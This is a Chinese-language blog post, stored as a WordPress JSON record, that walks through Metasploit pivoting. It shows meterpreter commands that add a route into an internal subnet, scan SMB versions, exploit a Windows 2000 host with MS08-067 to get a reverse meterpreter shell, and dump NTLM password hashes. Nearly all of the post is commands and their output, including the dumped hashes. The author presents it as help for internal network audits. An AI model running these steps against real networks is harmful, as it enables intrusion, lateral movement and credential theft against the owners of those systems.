{"id":803,"date":"2012-03-24T19:08:51","date_gmt":"2012-03-24T11:08:51","guid":{"rendered":"http:\/\/notes.zerobox.org\/?p=803"},"modified":"2012-03-24T19:08:51","modified_gmt":"2012-03-24T11:08:51","slug":"metasploit%e7%9a%84pivot%e5%ae%9e%e4%be%8b%e8%af%a6%e8%a7%a3","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/803.html","title":{"rendered":"metasploit\u7684pivot\u5b9e\u4f8b\u8be6\u89e3"},"content":{"rendered":"

\u51fa\u5904\uff1ahttp:\/\/hi.baidu.com\/p3rlish\/blog\/item\/d117a7f3a8b3384f352acc08.html<\/a><\/p>\n

first\uff0c\u4e0d\u7ba1\u600e\u4e48\u6837\uff0c\u5404\u79cd\u65b9\u5f0f\uff0c\u9996\u5148\u83b7\u5f97\u4e00\u4e2ashell\uff0csystem\u6743\u9650\u7684shell\uff0c\u5efa\u7acbmeterpter\u7684session
\nmeterpreter > getprivs
\n============================================================
\nEnabled Process Privileges
\n============================================================
\nSeDebugPrivilege
\nSeIncreaseQuotaPrivilege
\nSeSecurityPrivilege
\nSeTakeOwnershipPrivilege
\nSeLoadDriverPrivilege
\nSeSystemProfilePrivilege
\nSeSystemtimePrivilege
\nSeProfileSingleProcessPrivilege
\nSeIncreaseBasePriorityPrivilege
\nSeCreatePagefilePrivilege
\nSeBackupPrivilege
\nSeRestorePrivilege
\nSeShutdownPrivilege
\nSeSystemEnvironmentPrivilege
\nSeChangeNotifyPrivilege
\nSeRemoteShutdownPrivilege
\nSeUndockPrivilege
\nSeManageVolumePrivilege<\/p>\n

meterpreter > getsystem
\n…got system (via technique 1).<\/p>\n

\u7136\u540e\u770b\u4e0b\u672c\u5730\u7684ip\u795e\u9a6c\u7684<\/p>\n

meterpreter > ipconfig \/all<\/p>\n

Interface\u00a0 1
\n============
\nName\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : MS TCP Loopback interface
\nHardware MAC : 00:00:00:00:00:00
\nMTU\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 1520
\nIPv4 Address : 127.0.0.1
\nIPv4 Netmask : 255.0.0.0<\/p>\n

Interface 65539
\n============
\nName\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : Intel(R) PRO\/1000 MT Network Connection
\nHardware MAC : 00:0c:29:cd:69:e8
\nMTU\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 1500
\nIPv4 Address : 192.168.0.116
\nIPv4 Netmask : 255.255.255.0<\/p>\n

\u7136\u540e\u83b7\u53d6\u672c\u5730\u7f51\u7edc\u5206\u914d\u60c5\u51b5<\/p>\n

meterpreter > run get_local_subnets
\nLocal subnet: 192.168.0.0\/255.255.255.0<\/p>\n

ok\uff0c\u54b1\u4eec\u5f00\u59cb\u6dfb\u52a0\u672c\u5730\u7f51\u5173\u548cip\u5730\u5740\uff0c\u5728session\u91cc\u9762\u521b\u5efa\u865a\u62df\u8def\u7531\u529f\u80fd<\/p>\n

meterpreter > run autoroute -h
\nGet a list of local subnets based on the host’s routes
\nUSAGE: run get_local_subnets<\/p>\n

OPTIONS:<\/p>\n

-D\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Delete all routes (does not require a subnet)
\n-d\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Delete the named route instead of adding it
\n-h\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Help and usage
\n-n <opt>\u00a0 Netmask (IPv4, for example, 255.255.255.0
\n-p\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Print active routing table. All other options are ignored
\n-s <opt>\u00a0 Subnet (IPv4, for example, 10.10.10.0)<\/p>\n

\u4e0d\u591a\u89e3\u91ca\uff0c\u5927\u5bb6\u90fd\u80fd\u770b\u61c2\uff0c\u6211\u4eec\u5f00\u59cb\u6dfb\u52a0IP\u5730\u5740\u548c\u5b50\u7f51\u63a9\u7801<\/p>\n

meterpreter > run autoroute -s 192.168.0.0\/24
\n[*] Adding a route to 192.168.0.0\/255.255.255.0…
\n[+] Added route to 192.168.0.0\/255.255.255.0 via xxx.24y.x7.50
\n[*] Use the -p option to list all active routes<\/p>\n

\u81ea\u52a8\u5206\u914dIP\uff0c\u7136\u540e\u67e5\u770b\u4e00\u4e0b\u5206\u914d\u7684IP\u60c5\u51b5<\/p>\n

meterpreter > run autoroute -p<\/p>\n

Active Routing Table
\n====================<\/p>\n

Subnet\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Netmask\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Gateway
\n——\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ——-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ——-
\n192.168.0.0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 255.255.255.0\u00a0\u00a0\u00a0\u00a0\u00a0 Session 1<\/p>\n

\u521b\u5efa \u6210\u529f\uff0c\u5f53\u524dsession\u6210\u529f\u521b\u5efa\u865a\u62df\u8def\u7531\u5ba2\u6237\u7aef\uff0c\u540e\u53f0\u8fd0\u884c\u5f53\u524dsession<\/p>\n

meterpreter >
\nBackground session 1? [y\/N]<\/p>\n

\u626b\u63cf\u5f53\u524d\u76ee\u6807\u7f51\u7edc\u7684\u673a\u5668smb\u4fe1\u606f\uff0c\u501f\u6b64\u6765\u5224\u65ad\u5f00\u653esmb\u4fe1\u606f\u673a\u5668\u7684\u4e00\u4e9b\u4fe1\u606f<\/p>\n

msf\u00a0 auxiliary(smb_version) > run<\/p>\n

[*] Scanned 029 of 256 hosts (011% complete)
\n[*] Scanned 052 of 256 hosts (020% complete)
\n[*] Scanned 079 of 256 hosts (030% complete)
\n[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
\n[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
\n[*] Scanned 103 of 256 hosts (040% complete)
\n[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
\n[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
\n[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese – Traditional) (name:J86PG7C8XQQPZDD) (domain:\u96e8\u8587\u5728\u7ebf)
\n[*] Scanned 128 of 256 hosts (050% complete)
\n[*] Scanned 154 of 256 hosts (060% complete)
\n[*] Scanned 180 of 256 hosts (070% complete)
\n[*] Scanned 205 of 256 hosts (080% complete)
\n[*] Scanned 231 of 256 hosts (090% complete)
\n[*] Scanned 256 of 256 hosts (100% complete)
\n[*] Auxiliary module execution completed<\/p>\n

\u4eba\u54c1\u7206\u53d1\u4e86\uff0c\u5185\u7f51\u6709\u4e00\u53f0Windows 2000server\u7684\u673a\u5668\uff0c\u8bd5\u8bd508067\uff0c\u4f30\u8ba1\u6740\u4ed6\u8fd8\u662f\u6ca1\u95ee\u9898\u7684<\/p>\n

msf\u00a0 exploit(handler) > use exploit\/windows\/smb\/ms08_067_netapi
\nmsf\u00a0 exploit(ms08_067_netapi) > set LHOST 192.168.0.0
\nLHOST => 192.168.0.0
\nmsf\u00a0 exploit(ms08_067_netapi) > set LPORT 9988
\nLPORT => 9988
\nmsf\u00a0 exploit(ms08_067_netapi) > set RHOST 192.168.0.128
\nRHOST => 192.168.0.128
\nmsf\u00a0 exploit(ms08_067_netapi) > exploit<\/p>\n

[*] Started reverse handler on xx.xy.xxy.131:9988
\n[*] Automatically detecting the target…
\n[*] Fingerprint: Windows 2000 – Service Pack 4 with MS05-010+ – lang:Chinese – Traditional
\n[*] Selected Target: Windows 2000 Universal
\n[*] Attempting to trigger the vulnerability…
\n[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
\n[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012<\/p>\n

meterpreter ><\/p>\n

\u8fde\u8e29\u4e24\u6b21\u72d7\u5c4e\uff0c\u53ef\u4ee5\u53bb\u4e70\u5f69\u7968\u4e86\u3002\u6ea2\u51fa\u6210\u529f\uff0c\u73b0\u5728\u770b\u770bip\u795e\u9a6c\u7684<\/p>\n

meterpreter > ipconfig<\/p>\n

Interface\u00a0 1
\n============
\nName\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : MS TCP Loopback interface
\nHardware MAC : 00:00:00:00:00:00
\nMTU\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 1500
\nIPv4 Address : 127.0.0.1
\nIPv4 Netmask : 255.0.0.0<\/p>\n

Interface 16777219
\n============
\nName\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : AMD PCNET Family Ethernet Adapter
\nHardware MAC : 00:0c:29:5f:c6:cd
\nMTU\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 1500
\nIPv4 Address : 192.168.0.128
\nIPv4 Netmask : 255.255.255.0<\/p>\n

\u6ca1\u9519\uff0c\u7684\u786e\u662f\u6211\u4eec\u7684\u76ee\u6807\u673a\u5668\u7684\u5185\u7f51\u673a\u5668\uff0c\u8ddf\u4e0a\u9762\u7684IP\u662f\u6709\u6240\u4e0d\u540c\u7684\u5427\uff0c<\/p>\n

\u6293hash\u554a\uff0c\u4eb2\uff0c<\/p>\n

meterpreter > hashdump
\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
\nIUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
\nIWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
\nTsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::<\/p>\n

\u540e\u53f0\u8fd0\u884c\u770b\u4e00\u4e0b<\/p>\n

meterpreter >
\nBackground session 2? [y\/N]
\nmsf\u00a0 exploit(ms08_067_netapi) > sessions -l<\/p>\n

Active sessions
\n===============<\/p>\n

Id\u00a0 Type\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Information\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Connection
\n—\u00a0 —-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———–\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———-
\n1\u00a0\u00a0 meterpreter x86\/win32\u00a0 MILSEC\\Administrator @ MILSEC\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
\n2\u00a0\u00a0 meterpreter x86\/win32\u00a0 NT AUTHORITY\\SYSTEM @ J86PG7C8XQQPZDD\u00a0 xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)<\/p>\n

msf\u00a0 exploit(ms08_067_netapi) >
\n\u4eb2\uff0c\u4e24\u4e2a\u4e0d\u540c\u7684\u5185\u7f51IP\u548c\u4e0d\u540c\u7684\u5916\u7f51IP\u54e6\uff0c\u8bc1\u660e\u662f\u4e24\u53f0\u4e0d\u540c\u7684\u673a\u5668\u901a\u8fc7\u540c\u4e00\u4e2apivot\u73af\u5883\u6765\u6ea2\u51fa\u7684\uff0c<\/p>\n

 <\/p>\n

linux \u4e0b\u9762\u7684\u8fd9\u4e2a\u662f\u9700\u8981root\u6743\u9650\u6765\u6267\u884c\u7684\uff0c\u4e0d\u7136autoroute\u662f\u4f1a\u51fa\u95ee\u9898\u7684\uff0cLinux\u7684\u660e\u5929\u518d\u626f\uff0c\u5e0c\u671b\u8fd9\u4e2a\u5bf9\u5927\u5bb6\u505a\u5185\u7f51\u5ba1\u8ba1\u7684\u65f6\u5019\u80fd\u6709\u4e00\u4e9b\u5e2e\u52a9\u2026\u2026<\/p>\n","protected":false},"excerpt":{"rendered":"

\u51fa\u5904\uff1ahttp:\/\/hi.baidu.com\/p3rlish\/blog\/item …<\/p>\n

\u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[41],"class_list":["post-803","post","type-post","status-publish","format-standard","hentry","tag-metasploit"],"views":1161,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=803"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/803\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=803"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=803"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}